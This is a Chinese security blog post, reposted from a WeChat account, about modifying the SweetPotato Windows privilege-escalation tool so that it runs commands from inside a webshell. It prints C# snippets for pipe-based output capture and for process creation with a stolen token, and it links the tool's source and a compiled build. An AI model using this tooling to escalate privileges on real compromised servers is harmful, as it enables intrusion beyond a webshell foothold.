SweetPotato webshell下执行命令版

admin 2022年10月19日07:50:21评论71 views字数 1754阅读5分50秒阅读模式

前言

前两天看到了github上有老外发了一个C#版的烂土豆,所以就想改一个能在webshell下执行命令的版本。

请教了@zcgonvh和@RcoIl两位师傅,学习了用管道对进程与进程之间进行通信。感谢两位师傅的耐心指导~

注微信公众号回复“烂土豆”直接获取编译好的exe文件

管道

引用申明

  1. public struct SECURITY_ATTRIBUTES

  2. {

  3. public Int32 nLength;

  4. public IntPtr lpSecurityDescriptor;

  5. public int bInheritHandle;

  6. }

  7. [DllImport("kernel32.dll", SetLastError = true)]

  8. public static extern bool CreatePipe(ref IntPtr hReadPipe, ref IntPtr hWritePipe, ref SECURITY_ATTRIBUTES lpPipeAttributes, Int32 nSize);


  9. [DllImport("kernel32.dll", SetLastError = true)]

  10. public static extern bool ReadFile(IntPtr hFile, byte[] lpBuffer, int nNumberOfBytesToRead, ref int lpNumberOfBytesRead, IntPtr lpOverlapped/*IntPtr.Zero*/);


  11. [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]

  12. [return: MarshalAs(UnmanagedType.Bool)]

  13. internal static extern Boolean CloseHandle(IntPtr hObject);

创建管道

  1. SECURITY_ATTRIBUTES saAttr = new SECURITY_ATTRIBUTES();

  2. saAttr.nLength = Marshal.SizeOf(typeof(SECURITY_ATTRIBUTES));

  3. saAttr.bInheritHandle = 0x1;

  4. saAttr.lpSecurityDescriptor = IntPtr.Zero;


  5. if(CreatePipe(ref out_read, ref out_write, ref saAttr, 0))

  6. {

  7. Console.WriteLine("[+] CreatePipe success");

  8. }

新创建进程的标准输出连在写管道一端

  1. STARTUPINFO si = new STARTUPINFO();

  2. PROCESS_INFORMATION pi = new PROCESS_INFORMATION();

  3. si.cb = Marshal.SizeOf(si);

  4. si.lpDesktop = @"WinSta0Default";

  5. si.hStdOutput = out_write;

  6. si.hStdError = err_write;

  7. si.dwFlags |= STARTF_USESTDHANDLES;

  8. CreateProcessWithTokenW(potatoAPI.Token, 0, program, finalArgs, CREATE_NO_WINDOW, IntPtr.Zero, null, ref si, out pi);

读取管道

  1. CloseHandle(out_write);

  2. byte[] buf = new byte[BUFSIZE];

  3. int dwRead = 0;

  4. while (ReadFile(out_read, buf, BUFSIZE, ref dwRead, IntPtr.Zero))

  5. {

  6. byte[] outBytes = new byte[dwRead];

  7. Array.Copy(buf, outBytes, dwRead); Console.WriteLine(System.Text.Encoding.Default.GetString(outBytes));

  8. }

  9. CloseHandle(out_read);

截图

SweetPotato webshell下执行命令版

源码

https://github.com/uknowsec/SweetPotato

欢迎各位师傅star~


原文始发于微信公众号(零队):SweetPotato webshell下执行命令版

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月19日07:50:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SweetPotato webshell下执行命令版https://cn-sec.com/archives/922342.html

发表评论

匿名网友 填写信息